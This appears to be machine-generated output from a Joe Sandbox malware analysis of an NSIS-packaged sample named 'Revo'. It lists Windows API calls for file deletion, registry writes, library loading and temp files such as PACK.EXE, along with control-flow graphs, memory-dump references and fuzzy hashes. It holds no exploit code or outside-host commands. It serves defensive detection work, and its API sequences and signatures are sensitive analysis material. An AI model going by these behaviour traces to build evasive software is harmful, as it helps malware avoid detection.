• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
• GlobalFree.KERNEL32(?), ref: 00402A2B
• GlobalFree.KERNELBASE(00000000), ref: 00402A3E
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: c96ccbf9fda6c9b84cd62cb9b7995758edb6499716e88819902f7f7503e7d0df
• Instruction ID: 2a34c59540e1e2abd0e75fc718a4647e5be88802d3978a8477eddc4b0ca47f36
• Opcode Fuzzy Hash: c96ccbf9fda6c9b84cd62cb9b7995758edb6499716e88819902f7f7503e7d0df
• Instruction Fuzzy Hash: 2531B171D00124BBCF21AFA5DD89D9E7E79AF45364F14023AF411762E1CB794D418F68

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 870 40349e-4034c6 GetTickCount 871 4035f6-4035f8 call 403053 870->871 872 4034cc-4034f7 call 40361d SetFilePointer 870->872 875 4035fd-4035fe 871->875 877 4034fc-40350e 872->877 878 403600-403604 875->878 879 403510 877->879 880 403512-403520 call 403607 877->880 879->880 883 403526-403532 880->883 884 4035e8-4035eb 880->884 885 403538-40353e 883->885 884->878 886 403540-403546 885->886 887 403569-403585 call 406c11 885->887 886->887 888 403548-403563 call 403053 886->888 893 4035f1 887->893 894 403587-40358f 887->894 892 403568 888->892 892->887 895 4035f3-4035f4 893->895 896 403591-403599 call 406244 894->896 897 4035b2-4035b8 894->897 895->878 900 40359e-4035a0 896->900 897->893 899 4035ba-4035bc 897->899 899->893 901 4035be-4035d1 899->901 902 4035a2-4035ae 900->902 903 4035ed-4035ef 900->903 901->877 904 4035d7-4035e6 SetFilePointer 901->904 902->885 905 4035b0 902->905 903->895 904->871 905->901
APIs
• GetTickCount.KERNEL32 ref: 004034B2
  • Part of subcall function 0040361D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
• SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
• SetFilePointer.KERNEL32(00075088,00000000,00000000,004266F0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FilePointer$CountTick
• String ID: hA$B
• API String ID: 1092082344-3967375562
• Opcode ID: cb276c14483c105a7586c14d68be8b5b17aecd994db7d3163225ad987586a429
• Instruction ID: a6cc621958e3896f8f0562ac50284c64eb2e0996e34cc3673b0accbb5e92da07
• Opcode Fuzzy Hash: cb276c14483c105a7586c14d68be8b5b17aecd994db7d3163225ad987586a429
• Instruction Fuzzy Hash: C231D076504201EFDB209F6AFE419663FACF720356B85823FF901A22F0CB749901AB1D
APIs
• lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
• wsprintfW.USER32 ref: 00404F78
• SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$H'D
• API String ID: 3540041739-2781796796
• Opcode ID: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
• Instruction ID: afccc7aac3e313c9cd9c08cd77de86888644faadf6bfb13213ca5942e74a4345
• Opcode Fuzzy Hash: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
• Instruction Fuzzy Hash: 2311B7739041283BDB0065AD9C46E9E369CEB85374F254637FA26F71D1EA79CC2182E8
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
• wsprintfW.USER32 ref: 00406A78
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME
• API String ID: 2200240437-1106614640
• Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
• Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
• Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
• Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98
APIs
• GetDlgItem.USER32(?,?), ref: 00401DBF
• GetClientRect.USER32(?,?), ref: 00401E0A
• LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
• SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
• DeleteObject.GDI32(00000000), ref: 00401E5E
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
• Instruction ID: 8b1e6a7b1bb1698afdfead794f6417fbb3764ba01e46f9acc2dad3d3b5bdcb0f
• Opcode Fuzzy Hash: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
• Instruction Fuzzy Hash: 26213B72D04119AFCB05DF98DE85AEEBBB5EB08300F14003AF945F62A0D7749D81DB98
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
• Instruction ID: 9c099894a08b5387b140c0c6ceeae01ce9e162d44e3ef65fd99a7f94bc085c8a
• Opcode Fuzzy Hash: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
• Instruction Fuzzy Hash: 00219E71D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B889418B98
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402128
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00002000,?,0041E658,0040A000,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$CallbackDispatcherFreeHandleLoadModuleTextUserWindowlstrcat
• String ID:
• API String ID: 719239633-0
APIs
  • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
  • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 0040602A
  • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
  • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
• lstrlenW.KERNEL32(00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 004060D2
• GetFileAttributesW.KERNEL32(00456750,00456750,00456750,00456750,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 004060E2
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: PgE
• API String ID: 3248276644-3220684765
APIs
• RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,00004000,00000000,?,?,?,?,Remove folder: ,?,00000000,004067E1,80000002), ref: 004065B6
• RegCloseKey.KERNEL32(?), ref: 004065C1
Similarity
• API ID: CloseQueryValue
• String ID: Remove folder:
• API String ID: 3356406503-1958208860
APIs
• GetTickCount.KERNEL32 ref: 004061DF
• GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,004CD000,004D1000,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F), ref: 004061FA
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
                                                                                                                                              • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                              • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                                                                                                              • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                              • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                              • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                                                                                                              • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                              • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                              • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                                                                                                              • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                              • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GlobalFree.KERNEL32(0AAA5760), ref: 00401C30
• GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Global$AllocFree
• String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE
• API String ID: 3394109436-1038607665
APIs
• lstrlenW.KERNEL32(004125F8,00000023,00000011,00000002), ref: 004024FA
• RegSetValueExW.KERNEL32(?,?,?,?,004125F8,00000000,00000011,00000002), ref: 0040253A
• RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseValuelstrlen
• String ID:
• API String ID: 2655323295-0
APIs
  • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
  • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
• lstrlenW.KERNEL32 ref: 00402364
• lstrlenW.KERNEL32(00000000), ref: 0040236F
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1486964399-0
                                                                                                                                              • Opcode ID: 9995d0a3bc1ec283eb6257e663bd8360bd446cd403340e99a1a70e618ed02212
                                                                                                                                              • Instruction ID: 7cef90a7dc384cf9c97021313212113070c2cd8574a9969a0abcfcfa4bc01db0
                                                                                                                                              • Opcode Fuzzy Hash: 9995d0a3bc1ec283eb6257e663bd8360bd446cd403340e99a1a70e618ed02212
                                                                                                                                              • Instruction Fuzzy Hash: 34113371914314D6DB10EFF98A4A59EB6BCAF04354F20443FA405F72D1D7B8C5418B59
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00001FFF), ref: 004025F6
                                                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Enum$CloseValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 397863658-0
                                                                                                                                              • Opcode ID: ef84c1a1fe8b1ff10c5e784e766aa331886d34ef38f0b3ab15ccb812864dae0e
                                                                                                                                              • Instruction ID: ea3426adfb46afa29bf0fe74194f181189cf54c37864792d4d89e05057fb708c
                                                                                                                                              • Opcode Fuzzy Hash: ef84c1a1fe8b1ff10c5e784e766aa331886d34ef38f0b3ab15ccb812864dae0e
                                                                                                                                              • Instruction Fuzzy Hash: 4901DF71A00205BBEB149F94DE98AAFB678FF80308F10443EF001B21D0D7B84E01976D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040616D: GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                • Part of subcall function 0040616D: SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D81
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D89
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                              • Opcode ID: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
